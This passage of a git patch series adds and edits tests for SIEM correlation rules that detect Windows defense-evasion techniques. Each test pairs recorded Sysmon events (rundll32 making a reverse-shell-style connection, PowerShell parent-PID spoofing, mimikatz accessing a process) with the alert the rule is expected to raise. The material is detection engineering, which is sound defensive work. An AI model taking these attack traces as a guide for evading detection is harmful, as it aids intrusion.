"event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "79306", "object.process.cmdline": "rundll32.exe", "object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.guid": "365abb72-1282-5d1d-0000-0010dd401b00", "object.process.hash.imphash": "239D911DFA7551A8B735680BC39B2238", "object.process.hash.md5": "C648901695E275C8F2AD04B687A68CE2", "object.process.hash.sha1": "892503B20247B341CFD20DDA5FDACFA41527A087", "object.process.hash.sha256": "3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670", "object.process.id": "2328", "object.process.meta": "Description:Windows host process (Rundll32) | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "rundll32.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\notepad.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.parent.guid": "365abb72-1256-5d1d-0000-0010fb1a1b00", "object.process.parent.id": "1632", "object.process.parent.name": "notepad.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T15:52:44.707Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "79306", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-07-03T20:39:30.254Z", "type": "raw", "uuid": "71d38006-b76d-499a-86a8-2c442e84fdbb"} +{"action": "detect", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"3\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"3\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-07-03T20:39:31.7078585Z\"},\"EventRecordID\":\"8354\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"112\",\"ThreadID\":\"2096\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-07-03 20:39:30.305\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-1282-5d1d-0000-0010dd401b00}\"},{\"Name\":\"ProcessId\",\"text\":\"2328\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"Protocol\",\"text\":\"tcp\"},{\"Name\":\"Initiated\",\"text\":\"true\"},{\"Name\":\"SourceIsIpv6\",\"text\":\"false\"},{\"Name\":\"SourceIp\",\"text\":\"10.0.2.13\"},{\"Name\":\"SourceHostname\",\"text\":\"IEWIN7\"},{\"Name\":\"SourcePort\",\"text\":\"49159\"},{\"Name\":\"SourcePortName\"},{\"Name\":\"DestinationIsIpv6\",\"text\":\"false\"},{\"Name\":\"DestinationIp\",\"text\":\"10.0.2.18\"},{\"Name\":\"DestinationHostname\"},{\"Name\":\"DestinationPort\",\"text\":\"8181\"},{\"Name\":\"DestinationPortName\"}]}}}", "category.generic": "Connection", "category.high": "Network Interaction Management", "category.low": "State", "direction": "egress", "dst.host": "10.0.2.18", "dst.ip": "10.0.2.18", "dst.port": 8181, "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_3_Network_connection", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "3", "normalized": true, "object": "connection", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.guid": "365abb72-1282-5d1d-0000-0010dd401b00", "object.process.id": "2328", "object.process.name": "rundll32.exe", "object.process.path": "c:\\windows\\system32\\", "protocol": "tcp", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T15:52:44.707Z", "src.host": "iewin7", "src.hostname": "iewin7", "src.ip": "10.0.2.13", "src.port": 49159, "status": "success", "subject": "rule", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-07-03T20:39:30.305Z", "type": "raw", "uuid": "9087bbc1-2e29-478a-b817-7046e83dfbf3"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Reflective Code Loading", "correlation_name": "ReverseShell_created_via_PEInjection", "correlation_type": "incident", "datafield5": "3148", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4530c|C:\\Windows\\system32\\kernel32.dll+51133|C:\\Windows\\system32\\kernel32.dll+5cc37|C:\\Windows\\system32\\kernel32.dll+20ae|UNKNOWN(0053108F)|UNKNOWN(00531147)|UNKNOWN(0054001F)|C:\\Windows\\SYSTEM32\\ntdll.dll+63618|C:\\Windows\\SYSTEM32\\ntdll.dll+635eb", "direction": "egress", "dst.host": "10.0.2.18", "dst.ip": "10.0.2.18", "dst.port": 8181, "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "ReverseShell_created_via_PEInjection|iewin7|2328", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.session_id": "79306", "object.process.cmdline": "rundll32.exe", "object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "object.process.hash.md5": "C648901695E275C8F2AD04B687A68CE2", "object.process.hash.sha1": "892503B20247B341CFD20DDA5FDACFA41527A087", "object.process.hash.sha256": "3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670", "object.process.id": "2328", "object.process.meta": "Description:Windows host process (Rundll32) | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "rundll32.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\notepad.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.parent.id": "1632", "object.process.parent.name": "notepad.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "object.property": "GrantedAccess", "object.value": "0x1fffff", "protocol": "tcp", "src.host": "iewin7", "src.hostname": "iewin7", "src.ip": "10.0.2.13", "src.port": 49159, "status": "success", "subject": "process", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "79306"} From 4cb1f6e1a5beadfec799f224886e0dde54993fce Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 12:15:47 +0300 Subject: [PATCH 26/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Subrule=5FParentPid=5FS?= =?UTF-8?q?poofing)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Subrule_ParentPid_Spoofing/tests/test_1.sc | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Subrule_ParentPid_Spoofing/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Subrule_ParentPid_Spoofing/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Subrule_ParentPid_Spoofing/tests/test_1.sc new file mode 100644 index 00000000..7df816ab --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Subrule_ParentPid_Spoofing/tests/test_1.sc @@ -0,0 +1,5 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-03-21T21:45:04.9232227Z\"},\"EventRecordID\":\"244867\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2844\",\"ThreadID\":\"3648\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-03-21 21:45:04.906\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-26fd-5e76-0000-00100a320d01}\"},{\"Name\":\"SourceProcessId\",\"text\":\"8004\"},{\"Name\":\"SourceThreadId\",\"text\":\"108\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-8ae0-5e76-0000-0010933b8003}\"},{\"Name\":\"TargetProcessId\",\"text\":\"7708\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fa4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+48142|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+45a1a|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+455a6|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1c153|UNKNOWN(00007FF9A864DCCE)\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "108", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fa4|C:\\Windows\\System32\\KERNELBASE.dll+48142|C:\\Windows\\System32\\KERNELBASE.dll+45a1a|C:\\Windows\\System32\\KERNELBASE.dll+455a6|C:\\Windows\\System32\\KERNEL32.DLL+1c153|UNKNOWN(00007FF9A864DCCE)", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-8ae0-5e76-0000-0010933b8003", "object.process.id": "7708", "object.process.name": "cmd.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T13:01:38.206Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-03-21T21:45:04.906Z", "type": "raw", "uuid": "887f2297-d82d-4e58-8980-68b9d6e53fc4"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-03-21T21:45:04.9088577Z\"},\"EventRecordID\":\"244865\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2844\",\"ThreadID\":\"3648\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-03-21 21:45:04.906\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-26fd-5e76-0000-00100a320d01}\"},{\"Name\":\"SourceProcessId\",\"text\":\"8004\"},{\"Name\":\"SourceThreadId\",\"text\":\"108\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-06aa-5e76-0000-001046e10400}\"},{\"Name\":\"TargetProcessId\",\"text\":\"4668\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\Explorer.EXE\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1f3fff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc14|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+20d5e|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3066dbdb9f984\\\\System.ni.dll+381f60|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3066dbdb9f984\\\\System.ni.dll+2fa12e|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3066dbdb9f984\\\\System.ni.dll+2f8cd5|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3066dbdb9f984\\\\System.ni.dll+2c3b1e|C:\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\System\\\\1cccb0a82af13af5a3d3066dbdb9f984\\\\System.ni.dll+2c01f5|UNKNOWN(00007FF9A864D41C)\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "108", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc14|C:\\Windows\\System32\\KERNELBASE.dll+20d5e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+381f60|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+2fa12e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+2f8cd5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+2c3b1e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\1cccb0a82af13af5a3d3066dbdb9f984\\System.ni.dll+2c01f5|UNKNOWN(00007FF9A864D41C)", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\explorer.exe", "object.process.guid": "747f3d96-06aa-5e76-0000-001046e10400", "object.process.id": "4668", "object.process.name": "explorer.exe", "object.process.path": "c:\\windows\\", "object.property": "GrantedAccess", "object.value": "0x1f3fff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T13:01:38.206Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-03-21T21:45:04.906Z", "type": "raw", "uuid": "b3953ee7-11bd-4367-a320-00d789a252d2"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Access Token Manipulation: Parent PID Spoofing", "correlation_name": "Subrule_ParentPid_Spoofing", "correlation_type": "subrule", "datafield5": "108", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fa4|C:\\Windows\\System32\\KERNELBASE.dll+48142|C:\\Windows\\System32\\KERNELBASE.dll+45a1a|C:\\Windows\\System32\\KERNELBASE.dll+455a6|C:\\Windows\\System32\\KERNEL32.DLL+1c153|UNKNOWN(00007FF9A864DCCE)", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "info", "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-8ae0-5e76-0000-0010933b8003", "object.process.id": "7708", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.id": "4668", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff|0x1f3fff", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\"} \ No newline at end of file From 7e794fbd3453f1174f291b681c596d212733be29 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 12:21:10 +0300 Subject: [PATCH 27/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Suspend=5FProcess)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc index aee74788..1e6b5484 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspend_Process/tests/test_1.sc @@ -1,3 +1,3 @@ {"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-28T16:29:42.9881250Z\"},\"EventRecordID\":\"7845\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1940\",\"ThreadID\":\"1316\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-28 16:29:42.988\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{365abb72-d3c2-5cc5-0000-0010d9790500}\"},{\"Name\":\"SourceProcessId\",\"text\":\"860\"},{\"Name\":\"SourceThreadId\",\"text\":\"864\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\Win32\\\\mimikatz.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{365abb72-d3e8-5cc5-0000-0010e7d30500}\"},{\"Name\":\"TargetProcessId\",\"text\":\"748\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\notepad.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x800\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4595c|C:\\\\Windows\\\\system32\\\\KERNELBASE.dll+8185|C:\\\\Users\\\\IEUser\\\\Desktop\\\\Win32\\\\mimikatz.exe+5b414|C:\\\\Users\\\\IEUser\\\\Desktop\\\\Win32\\\\mimikatz.exe+5b376|C:\\\\Users\\\\IEUser\\\\Desktop\\\\Win32\\\\mimikatz.exe+45933\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "864", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b414|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b376|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+45933", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-d3e8-5cc5-0000-0010e7d30500", "object.process.id": "748", "object.process.name": "notepad.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x800", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T09:21:22.800Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-d3c2-5cc5-0000-0010d9790500", "subject.process.id": "860", "subject.process.name": "mimikatz.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\win32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-28T16:29:42.988Z", "type": "raw", "uuid": "5cad36e4-7a3b-43f7-b185-3cd6eb38fc98"} -expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Process Injection", "correlation_name": "Suspend_Process", "correlation_type": "incident", "datafield5": "864", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b414|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b376|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+45933", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Suspend_Process|iewin7|c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-d3e8-5cc5-0000-0010e7d30500", "object.process.id": "748", "object.process.name": "notepad.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x800", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-d3c2-5cc5-0000-0010d9790500", "subject.process.id": "860", "subject.process.name": "mimikatz.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\win32\\"} +expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Process Injection", "correlation_name": "Suspend_Process", "correlation_type": "incident", "datafield5": "864", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b414|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+5b376|C:\\Users\\IEUser\\Desktop\\Win32\\mimikatz.exe+45933", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Suspend_Process|iewin7|c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-d3e8-5cc5-0000-0010e7d30500", "object.process.id": "748", "object.process.name": "notepad.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x800", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-d3c2-5cc5-0000-0010d9790500", "subject.process.id": "860", "subject.process.name": "mimikatz.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\win32\\"} \ No newline at end of file From bd71b6260c15b09417e351a3a812709994d2fcbc Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 12:24:11 +0300 Subject: [PATCH 28/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Suspicious=5FExplorer?= =?UTF-8?q?=5FInjection)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 